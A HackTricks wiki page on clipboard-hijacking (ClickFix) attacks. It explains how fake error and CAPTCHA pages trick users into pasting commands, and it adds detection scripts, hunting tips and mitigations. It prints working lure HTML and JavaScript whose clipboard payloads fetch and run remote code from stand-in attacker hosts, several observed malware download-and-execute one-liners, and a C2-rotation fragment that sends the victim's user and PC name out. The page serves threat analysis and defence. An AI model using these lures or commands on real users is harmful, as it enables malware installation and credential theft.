Clipboard Hijacking (Pastejacking) Attacks
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
“Don't paste anything you didn't copy yourself.” – old but still sound advice
Overview
Clipboard hijacking – also known as pastejacking – abuses the fact that users routinely copy and paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or desktop application) programmatically places attacker-controlled text on the system clipboard. Victims are encouraged, usually through carefully crafted social-engineering instructions, to press Win + R (Run dialog), Win + X (Quick Access / PowerShell), or open a terminal and paste the clipboard contents, immediately executing arbitrary commands.
Because no file is downloaded and no attachment is opened, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, the Latrodectus loader or Lumma Stealer.
Forced “Copy” buttons and hidden payloads (macOS one-liners)
Some macOS infostealers imitate installer sites (for example, Homebrew) and force the use of a “Copy” button so users cannot simply highlight the visible text. The clipboard entry contains the expected installer command plus a Base64 payload appended at the end (for example, ...; echo <b64> | base64 -d | sh), so a single paste executes both while the UI hides the extra step.
JavaScript Proof-of-Concept
```html
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
  const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
  navigator.clipboard.writeText(payload)
    .then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
```
Older campaigns used document.execCommand('copy'); newer ones rely on the asynchronous Clipboard API (navigator.clipboard.writeText).
ClickFix / ClearFake flow
- The user visits a typosquatted or compromised site (e.g., docusign.sa[.]com).
- Injected ClearFake JavaScript calls a helper unsecuredCopyToClipboard() that silently places a Base64-encoded PowerShell one-liner on the clipboard.
- HTML instructions tell the victim: “Press Win + R, paste the command and press Enter to resolve the issue.”
- powershell.exe executes, downloading an archive that contains a legitimate executable plus a malicious DLL (classic DLL sideloading).
- The loader decrypts additional stages, injects shellcode and installs persistence (e.g. a scheduled task), ultimately running NetSupport RAT / Latrodectus / Lumma Stealer.
Example NetSupport RAT chain
```powershell
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
```
- jp2launcher.exe (legitimate Java WebStart) looks for msvcp140.dll in its own directory.
- The malicious DLL resolves APIs at runtime with GetProcAddress, downloads two binaries (data_3.bin, data_4.bin) via curl.exe, decrypts them using the rolling XOR key "https://google.com/", injects the final shellcode and unpacks client32.exe (NetSupport RAT) to C:\ProgramData\SecurityCheck_v1\.
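The decode step in the chain above is also the detection opportunity: an -enc argument is just Base64 of a UTF-16LE script, so a sensor can recover the plaintext and look for download-cradle primitives before the archive is ever fetched. The following Python is an added example (not HackTricks code and not the malware's); the sample command line is constructed for the test with a placeholder domain, and the indicator table is a small constructed subset to extend with your own rules.

```python
import base64
import binascii
import re
from typing import Optional

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is Base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"(?<!\S)-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)

# Download/execute primitives looked for in the decoded script (constructed subset, extend as needed).
CRADLE_PATTERNS = {
    "Invoke-WebRequest": re.compile(r"\b(?:invoke-webrequest|iwr)\b", re.I),
    "Invoke-RestMethod": re.compile(r"\b(?:invoke-restmethod|irm)\b", re.I),
    "Invoke-Expression": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    "DownloadString": re.compile(r"\bdownloadstring\b", re.I),
    "Expand-Archive": re.compile(r"\bexpand-archive\b", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script hidden behind -enc, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def cradle_indicators(text: str) -> list:
    """Names of the download/execute primitives present in the text, in table order."""
    return [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]


def triage(cmdline: str) -> dict:
    """Decode, scan and score one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    hits = cradle_indicators(decoded if decoded is not None else cmdline)
    hidden = bool(HIDDEN_WINDOW.search(cmdline))
    return {
        "decoded": decoded,
        "indicators": hits,
        "hidden_window": hidden,
        # A cradle that is also encoded or hidden is the ClickFix shape; plain cradles are noisier.
        "suspicious": bool(hits) and (decoded is not None or hidden),
    }


# Constructed fixture: a download-and-sideload script in the shape shown above, encoded the way
# PowerShell expects (UTF-16LE, then Base64). The domain is a placeholder, not an IoC.
SAMPLE_SCRIPT = (
    "Invoke-WebRequest -Uri https://c2.example.invalid/f.zip -OutFile $env:TEMP\\f.zip; "
    "Expand-Archive $env:TEMP\\f.zip -DestinationPath $env:TEMP\\f"
)
SAMPLE_CMDLINE = "powershell -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Feed it the NewProcessName/CommandLine pair of every 4688 event whose parent is explorer.exe; the decoded text is what belongs in the alert, since the Base64 blob itself rotates per campaign.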
Latrodectus Loader
```powershell
powershell -nop -enc <Base64> # Cloud Identificator: 2031
```
- Downloads la.txt with curl.exe
- Runs a JScript downloader inside cscript.exe
- Fetches an MSI payload → drops libcef.dll next to a signed application → DLL sideloading → shellcode → Latrodectus.
Lumma Stealer via MSHTA
```cmd
mshta https://iplogger.co/xxxx =+\\xxx
```
The mshta call launches an obfuscated PowerShell script that fetches PartyContinued.exe, extracts Boat.pst (CAB), rebuilds AutoIt3.exe using extrac32 and file concatenation, and finally runs an .a3x script that exfiltrates browser credentials to sumeriavgv.digital.
ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)
Some ClickFix campaigns skip file downloads entirely and instruct victims to paste a one-liner that fetches and runs JavaScript via WSH, persists it, and rotates the C2 daily. An example of an observed chain:
```powershell
powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prеss Entеr
```
Key characteristics
- The obfuscated URL is reversed at runtime to evade simple inspection.
- The JavaScript persists via a Startup LNK (WScript/CScript) and picks the C2 by the current day, enabling rapid domain rotation.
A small JS fragment used to rotate C2s by date:
```javascript
// Helpers getDaysDiff() and getListElement() and the user_name / pc_name / first_infection_datetime
// variables are defined elsewhere in the sample; only the C2 selection is shown here.
function getURL() {
  var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
  var current_datetime = new Date().getTime();
  var no_days = getDaysDiff(0, current_datetime);
  return 'https://'
    + getListElement(C2_domain_list, no_days)
    + '/Y/?t=' + current_datetime
    + '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
}
```
The next stage often delivers a loader that establishes persistence and pulls a RAT (for example, PureHVNC), frequently pinning TLS to a hardcoded certificate and chunking traffic.
Detection ideas specific to this variant
- Process tree: explorer.exe → powershell.exe -c → wscript.exe <temp>\a.js (or cscript.exe).
- Startup artifacts: an LNK in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup invoking WScript/CScript with a JS path under %TEMP%/%APPDATA%.
- Registry/RunMRU and command-line telemetry containing .split('').reverse().join('') or eval(a.responseText).
- Repeated powershell -NoProfile -NonInteractive -Command - with large stdin payloads to feed long scripts without long command lines.
- Scheduled Tasks that subsequently execute LOLBins such as regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll" under an updater-looking task/path (e.g., \GoogleSystem\GoogleUpdater).
Threat hunting
- Daily-rotating C2 hostnames and URLs with the .../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection> pattern.
- Correlate clipboard write events followed by a Win+R paste and then immediate powershell.exe execution.
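The two hunting leads above (the reversed URL in the command line and the /Y/?t= beacon shape) can be automated. The Python below is an added example, not HackTricks code or the loader's: it un-reverses any string literal the command line reverses at runtime, parses the beacon URL into host, UTC time and victim profile, and lists the hostname to expect on each day. The daily rotation assumes getListElement() indexes by days-since-epoch modulo the list length, which is an assumption about the sample, not something the fragment confirms; the domains and command line are constructed placeholders, not IoCs.

```python
import re
from datetime import date, datetime, timedelta, timezone
from urllib.parse import unquote

# A quote that may be backslash-escaped, because the JS sits inside a PowerShell string in telemetry.
_Q = r'\\?["\']'
# "<reversed>".split("").reverse().join("")  (whitespace-tolerant, quotes optionally escaped)
REVERSE_IDIOM = re.compile(
    _Q + r'([^"\'\\]+)' + _Q + r'\s*\.split\(' + _Q + _Q + r'\)\s*\.reverse\(\)\s*\.join\(' + _Q + _Q + r'\)',
    re.IGNORECASE,
)
# The beacon shape from the fragment above: /Y/?t=<epoch>&v=5&p=<user_pc_firstinfection>
BEACON_URL = re.compile(r"https?://(?P<host>[^/\s]+)/Y/\?t=(?P<t>\d{10,13})&v=5&p=(?P<p>[^&\s\"']+)")


def recover_reversed_strings(cmdline: str) -> list:
    """Un-reverse every string literal the command line reverses at runtime."""
    return [m.group(1)[::-1] for m in REVERSE_IDIOM.finditer(cmdline)]


def parse_beacon(url: str):
    """Split a rotating-C2 beacon URL into host, UTC time and victim profile; None if it is not one."""
    m = BEACON_URL.search(url)
    if not m:
        return None
    ts = int(m["t"])
    if len(m["t"]) == 13:          # JS Date.getTime() is milliseconds
        ts //= 1000
    return {"host": m["host"],
            "time": datetime.fromtimestamp(ts, tz=timezone.utc),
            "profile": unquote(m["p"])}


def expected_c2_host(domains: list, day) -> str:
    """Host the loader would pick on a given day (date or ISO string). Assumption: the index is
    days-since-epoch modulo the list length, which is how a daily rotation over a fixed list behaves."""
    if isinstance(day, str):
        day = date.fromisoformat(day)
    return domains[(day - date(1970, 1, 1)).days % len(domains)]


def hunt_hosts(domains: list, start_iso: str, ndays: int) -> list:
    """(ISO date, hostname) pairs to search DNS/proxy logs for over a date range."""
    start = date.fromisoformat(start_iso)
    return [((start + timedelta(days=i)).isoformat(), expected_c2_host(domains, start + timedelta(days=i)))
            for i in range(ndays)]


# Constructed sample: placeholder domains and a command line in the observed shape, with the beacon
# URL reversed exactly as the loader does it. None of these values are real IoCs.
PLACEHOLDER_DOMAINS = ["c2-a.example.invalid", "c2-b.example.invalid", "c2-c.example.invalid",
                       "c2-d.example.invalid", "c2-e.example.invalid"]
HIDDEN_URL = "https://c2-a.example.invalid/Y/?t=1700000000000&v=5&p=alice_PC1_20231114"
SAMPLE_CMDLINE = (
    'powershell -c "sc $j \'a.open(\\"GET\\",\\"' + HIDDEN_URL[::-1]
    + '\\".split(\\"\\").reverse().join(\\"\\"),0);eval(a.responseText);\';wscript $j"'
)

if __name__ == "__main__":
    for url in recover_reversed_strings(SAMPLE_CMDLINE):
        print(url, parse_beacon(url))
    print(hunt_hosts(PLACEHOLDER_DOMAINS, "2023-11-14", 3))
```

Run recover_reversed_strings over RunMRU entries and 4688 command lines; anything that yields a URL is worth an alert on its own, and parse_beacon on proxy logs gives you the victim profile (user, host, first-infection date) that the loader leaks in every request.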
Blue teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
- Windows Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps a history of Win + R commands – look for unusual Base64 / obfuscated entries.
- Security Event ID 4688 (Process Creation) where ParentImage == explorer.exe and NewProcessName in {powershell.exe, wscript.exe, mshta.exe, curl.exe, cmd.exe}.
- Event ID 4663 for file creations under %LocalAppData%\Microsoft\Windows\WinX\ or temporary folders right before the suspicious 4688 event.
- EDR clipboard sensors (if present) – correlate Clipboard Write followed immediately by a new PowerShell process.
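The RunMRU and clipboard-to-process correlations above, worked through in Python as an added example (not HackTricks code): RunMRU stores one value per letter with a literal "\1" suffix and an MRUList value giving the order, so the history can be rebuilt most-recent-first and screened; the correlation then flags console hosts that explorer.exe (the Run dialog) spawns within a short window after a clipboard write. The registry export and event timeline are constructed fixtures, and the truncated Base64 in them is a placeholder, not a real payload.

```python
import re
from datetime import datetime, timedelta

CONSOLE_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "curl.exe"}

# A Win+R entry is interesting when a script/LOLBin host is combined with an execution or download trait.
SUSPICIOUS_RUN = re.compile(
    r"(?:powershell|pwsh|mshta|wscript|cscript|regsvr32|rundll32)\b.*?"
    r"(?:-e(?:nc|c)?\s|-w\s+h|\biex\b|\birm\b|\biwr\b|https?:|base64|eval\(|reverse\(\))",
    re.IGNORECASE | re.DOTALL,
)


def runmru_history(values: dict) -> list:
    """Win+R commands, most recent first. Each lettered value ends in a literal '\\1';
    MRUList lists the letters in recency order."""
    return [values[k].removesuffix("\\1") for k in values["MRUList"] if k in values]


def suspicious_run_entries(values: dict) -> list:
    return [cmd for cmd in runmru_history(values) if SUSPICIOUS_RUN.search(cmd)]


def correlate_clipboard_and_console(events: list, window_seconds: int = 30) -> list:
    """Flag console hosts spawned by explorer.exe within window_seconds after a clipboard write.
    Events are dicts with an ISO 'time' and a 'type' of 'ClipboardWrite' or '4688'."""
    clips = [datetime.fromisoformat(e["time"]) for e in events if e["type"] == "ClipboardWrite"]
    alerts = []
    for e in events:
        if e["type"] != "4688" or e.get("parent") != "explorer.exe" or e["image"] not in CONSOLE_HOSTS:
            continue
        t = datetime.fromisoformat(e["time"])
        recent = [c for c in clips if timedelta(0) <= t - c <= timedelta(seconds=window_seconds)]
        if recent:
            alerts.append({"time": e["time"], "image": e["image"], "cmdline": e.get("cmdline", ""),
                           "seconds_after_clipboard": int((t - max(recent)).total_seconds())})
    return alerts


# Constructed RunMRU export (shape of Get-ItemProperty output); the Base64 is a truncated placeholder.
RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -nop -w hidden -enc SQBuAHYAbwBrAGUA\\1",
}

# Constructed timeline: one clipboard write followed by a Run-dialog PowerShell, one benign console
# launch with no clipboard activity nearby, and one scheduled-task PowerShell not parented by explorer.
EVENTS = [
    {"time": "2026-02-10T09:14:02", "type": "ClipboardWrite", "image": "chrome.exe"},
    {"time": "2026-02-10T09:14:09", "type": "4688", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBuAHYAbwBrAGUA"},
    {"time": "2026-02-10T10:30:00", "type": "4688", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell"},
    {"time": "2026-02-10T11:00:01", "type": "ClipboardWrite", "image": "chrome.exe"},
    {"time": "2026-02-10T11:00:05", "type": "4688", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    print(suspicious_run_entries(RUNMRU))
    print(correlate_clipboard_and_console(EVENTS))
```

Without a clipboard sensor, the same correlation still works with the browser's own process activity or the 4663 WinX file-creation events as the left-hand side of the window.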
IUAM-style verification pages (ClickFix Generator): clipboard copy-to-console + OS-aware payloads
Recent campaigns mass-produce fake CDN/browser verification pages (“Just a moment…”, IUAM-style) that get users to copy OS-specific commands from their clipboard into native consoles. This moves execution out of the browser sandbox and works on both Windows and macOS.
Key traits of the builder-generated pages
- OS detection via navigator.userAgent to tailor payloads (Windows PowerShell/CMD vs. macOS Terminal). Optional decoys/no-ops for unsupported OSes to maintain the illusion.
- Automatic clipboard-copy on benign UI actions (checkbox/Copy) while the visible text may differ from the clipboard content.
- Mobile blocking and a popover with step-by-step instructions: Windows → Win+R → paste → Enter; macOS → open Terminal → paste → Enter.
- Optional obfuscation and a single-file injector to overwrite a compromised site’s DOM with a Tailwind-styled verification UI (no new domain registration required).
Example: clipboard mismatch + OS-aware branching
```html
<div class="space-y-2">
  <label class="inline-flex items-center space-x-2">
    <input id="chk" type="checkbox" class="accent-blue-600"> <span>I am human</span>
  </label>
  <div id="tip" class="text-xs text-gray-500">If the copy fails, click the checkbox again.</div>
</div>
<script>
const ua = navigator.userAgent;
const isWin = ua.includes('Windows');
const isMac = /Mac|Macintosh|Mac OS X/.test(ua);
const psWin = `powershell -nop -w hidden -c "iwr -useb https://example[.]com/cv.bat|iex"`;
const shMac = `nohup bash -lc 'curl -fsSL https://example[.]com/p | base64 -d | bash' >/dev/null 2>&1 &`;
const shown = 'copy this: echo ok'; // benign-looking string on screen
const real = isWin ? psWin : (isMac ? shMac : 'echo ok');
function copyReal() {
  // UI shows a harmless string, but clipboard gets the real command
  navigator.clipboard.writeText(real).then(()=>{
    document.getElementById('tip').textContent = 'Now press Win+R (or open Terminal on macOS), paste and hit Enter.';
  });
}
document.getElementById('chk').addEventListener('click', copyReal);
</script>
```
macOS persistence of the initial run
- Uses nohup bash -lc '<fetch | base64 -d | bash>' >/dev/null 2>&1 & so execution continues after the terminal is closed, reducing visible artifacts.
In-place page takeover on compromised sites
```html
<script>
(async () => {
  const html = await (await fetch('https://attacker[.]tld/clickfix.html')).text();
  document.documentElement.innerHTML = html; // overwrite DOM
  const s = document.createElement('script');
  s.src = 'https://cdn.tailwindcss.com'; // apply Tailwind styles
  document.head.appendChild(s);
})();
</script>
```
Detection & hunting ideas specific to IUAM-style lures
- Web: pages that bind the Clipboard API to verification widgets; mismatch between displayed text and clipboard payload; navigator.userAgent branching; Tailwind + single-page replace in suspicious contexts.
- Windows endpoint: explorer.exe → powershell.exe/cmd.exe shortly after a browser interaction; batch/MSI installers executed from %TEMP%.
- macOS endpoint: Terminal/iTerm spawning bash/curl/base64 -d with nohup near browser events; background jobs surviving terminal close.
- Correlate RunMRU Win+R history and clipboard writes with subsequent console process creation.
See also for supporting techniques
2026 fake CAPTCHA / ClickFix evolutions (ClearFake, Scarlet Goldfinch)
- ClearFake continues to compromise WordPress sites and inject loader JavaScript that chains external hosts (Cloudflare Workers, GitHub/jsDelivr) and even blockchain “etherhiding” calls (e.g., POSTs to Binance Smart Chain API endpoints such as bsc-testnet.drpc[.]org) to pull current lure logic. Recent overlays heavily use fake CAPTCHAs that instruct users to copy/paste a one-liner (T1204.004) instead of downloading anything.
- Initial execution is increasingly delegated to signed script hosts/LOLBAS. January 2026 chains swapped the earlier mshta usage for the built-in SyncAppvPublishingServer.vbs executed via WScript.exe, passing PowerShell-like arguments with aliases/wildcards to fetch remote content:
```cmd
"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\SyncAppvPublishingServer.vbs" "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/grading-chatter-dock73/vigilant-bucket-gui/p1lot')"
```
SyncAppvPublishingServer.vbs is signed and normally used by App-V; combined with WScript.exe and unusual arguments (gal/gcm aliases, wildcarded cmdlets, jsDelivr URLs) it becomes a high-signal LOLBAS step for ClearFake.
- February 2026 fake CAPTCHA payloads returned to plain PowerShell download paths. Two live examples:
```powershell
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -c iex(irm 158.94.209[.]33 -UseBasicParsing)
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$w=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$w.Open('GET','https[:]//cdn[.]jsdelivr[.]net/gh/www1day7/msdn/fase32',0);$w.Send();$f=$env:TEMP+'\FVL.ps1';$w.ResponseText>$f;powershell -w h -ep bypass -f $f"
```
- The first chain is an in-memory grabber, iex(irm ...); the second stages through WinHttp.WinHttpRequest.5.1, writes a temporary .ps1, then launches it with -ep bypass in a hidden window.
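The alias/wildcard trick in the January 2026 chain (gal i*x, gcm *stM*) hides the cmdlet names from keyword rules, but a wildcard lookup is deterministic, so an analyst can resolve it offline. The Python below is an added example (not HackTricks code): it resolves each &(gal pattern) / &(gcm pattern) against a table of default aliases and cmdlet names, rewrites the argument string with the cmdlets spelled out, and flags the download-then-execute combination. The alias table is a small constructed subset (take the live list from Get-Alias / Get-Command when building a production rule) and the sample argument string uses a placeholder URL.

```python
import fnmatch
import re

# Constructed subset of PowerShell default aliases (alias -> cmdlet). Real hosts have many more.
ALIASES = {
    "iex": "Invoke-Expression", "irm": "Invoke-RestMethod", "iwr": "Invoke-WebRequest",
    "gal": "Get-Alias", "gcm": "Get-Command", "sal": "Set-Alias", "ii": "Invoke-Item",
    "icm": "Invoke-Command", "ipmo": "Import-Module", "iwmi": "Invoke-WmiMethod",
}
# Cmdlet names gcm can see; again a constructed subset.
CMDLETS = sorted(set(ALIASES.values()) | {"Invoke-History", "Test-Path", "Start-Process", "Set-Content"})

# &(gal <pattern>) or &(gcm <pattern>) as seen in the WScript/SyncAppvPublishingServer.vbs arguments
LOOKUP = re.compile(r"&\(\s*(gal|get-alias|gcm|get-command)\s+([^\s)]+)\s*\)", re.IGNORECASE)


def resolve_wildcard(pattern: str, names) -> list:
    """Case-insensitive wildcard match, as PowerShell resolves -Name patterns."""
    return [n for n in names if fnmatch.fnmatchcase(n.lower(), pattern.lower())]


def deobfuscate_lookups(args: str) -> str:
    """Replace each alias/command lookup with the cmdlet(s) it resolves to."""
    def repl(m):
        kind, pattern = m.group(1).lower(), m.group(2)
        if kind in ("gal", "get-alias"):
            hits = sorted({ALIASES[a] for a in resolve_wildcard(pattern, ALIASES)})
        else:
            hits = resolve_wildcard(pattern, CMDLETS)
        return "|".join(hits) if hits else m.group(0)   # leave unresolved lookups visible
    return LOOKUP.sub(repl, args)


def classify(args: str) -> dict:
    """Resolve lookups, then report whether the result is a fetch-and-execute cradle."""
    resolved = deobfuscate_lookups(args)
    low = resolved.lower()
    fetch = any(k in low for k in ("invoke-restmethod", "invoke-webrequest", "downloadstring"))
    return {
        "resolved": resolved,
        "wildcard_lookup": bool(LOOKUP.search(args)),
        "remote_code_execution": "invoke-expression" in low and fetch,
    }


# Constructed sample in the shape of the observed argument string; the URL is a placeholder.
SAMPLE_ARGS = "n;&(gal i*x)(&(gcm *stM*) 'cdn.example.invalid/stage1')"

if __name__ == "__main__":
    print(classify(SAMPLE_ARGS))
```

The resolved form is what a keyword rule should match on; alerting on the presence of wildcard_lookup alone is also reasonable, since legitimate scripts rarely look up their own cmdlets by glob.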
Detection/hunting tips for these variants
- Process lineage: browser → explorer.exe → wscript.exe ... SyncAppvPublishingServer.vbs or PowerShell cradles immediately after clipboard writes/Win+R.
- Command-line keywords: SyncAppvPublishingServer.vbs, WinHttp.WinHttpRequest.5.1, -UseBasicParsing, %TEMP%\FVL.ps1, jsDelivr/GitHub/Cloudflare Worker domains, or raw-IP iex(irm ...) patterns.
- Network: outbound connections to CDN worker hosts or blockchain RPC endpoints from script hosts/PowerShell shortly after web browsing.
- File/registry: temporary .ps1 creation under %TEMP% together with RunMRU entries showing these one-liners; block/alert on signed-script LOLBAS (WScript/cscript/mshta) executing with external URLs or obfuscated alias strings.
Mitigations
- Browser hardening – disable clipboard write access (dom.events.asyncClipboard.clipboardItem etc.) or require a user gesture.
- Security awareness – train users to type sensitive commands or paste them into a text editor first.
- PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners.
- Network controls – block outbound requests to known pastejacking and malware C2 domains.
Related Tricks
- Discord Invite Hijacking often uses the same ClickFix approach after luring users into a malicious server:
References
- Fix the Click: Preventing the ClickFix Attack Vector
- Pastejacking PoC – GitHub
- Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder
- The ClickFix Factory: First Exposure of IUAM ClickFix Generator
- 2025, the year of the Infostealer
- Red Canary – Intelligence Insights: February 2026